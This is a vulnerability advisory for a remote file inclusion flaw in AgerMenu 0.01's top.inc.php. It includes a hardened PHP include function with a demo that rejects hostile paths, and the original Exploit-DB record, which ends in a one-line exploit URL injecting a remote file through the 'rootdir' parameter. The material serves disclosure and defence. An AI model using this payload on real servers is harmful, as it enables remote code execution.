Vendor: AgerMenu
By: GolD_M (Mahmnood_ali)
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: AgerMenu
Affected Version From: AgerMenu version 0.01
Affected Version To: AgerMenu version 0.01
Patch Exists: NO
2007

Remote File Inclusion in AgerMenu

The PHP script 'top.inc.php' in AgerMenu version 0.01 is vulnerable to remote file inclusion. The script builds an include path from the 'rootdir' variable, so an attacker can append a malicious file path to the 'rootdir' parameter in the URL and have the script include a remote file. Any code in the included file is then executed by the server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use proper input validation techniques. Additionally, keeping software up to date and applying patches can help prevent exploitation.
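
A hardened form of the include in top.inc.php, as an added example that is not AgerMenu's code or part of the original advisory. The function name resolve_include, the temporary demo directory and the assumption that inc/ sits directly under the install root are illustrative.

```php
<?php
declare(strict_types=1);

// Vulnerable line quoted in the advisory (example/inc/top.inc.php):
//   include $rootdir."inc/agermenu.func.php";
// Hardened form: the root is computed from the file's own location and the
// final path is canonicalised and confined before it reaches include/require.

/** Return the canonical path of $relative inside $baseDir, or throw. */
function resolve_include(string $baseDir, string $relative): string
{
    // Reject stream wrappers (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) === 1
        || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('wrapper or NUL byte in path');
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $full === false || !is_file($full)) {
        throw new RuntimeException('target does not exist');
    }
    // After symlink and ../ resolution the file must still sit under $base.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('target escapes base directory');
    }
    return $full;
}

// Constructed demo tree standing in for an AgerMenu install (assumed layout).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'agermenu_demo_' . getmypid();
if (!is_dir($root . '/inc')) {
    mkdir($root . '/inc', 0700, true);
}
file_put_contents($root . '/inc/agermenu.func.php', "<?php // constructed stub\n");

// In top.inc.php itself the equivalent would be (assumption about layout):
//   $rootdir = dirname(__DIR__) . '/';   // never read from the request
//   require resolve_include($rootdir, 'inc/agermenu.func.php');
$candidates = ['inc/agermenu.func.php', 'http://example.invalid/Evil.txt?', '../outside.php'];
foreach ($candidates as $candidate) {
    try {
        echo $candidate, ' => ', resolve_include($root, $candidate), PHP_EOL;
    } catch (Throwable $e) {
        echo $candidate, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Setting allow_url_include = Off in php.ini blocks the remote variant independently of the code change.
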
Source

Exploit-DB raw data:

===============================================================
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================

# milw0rm.com [2007-02-07]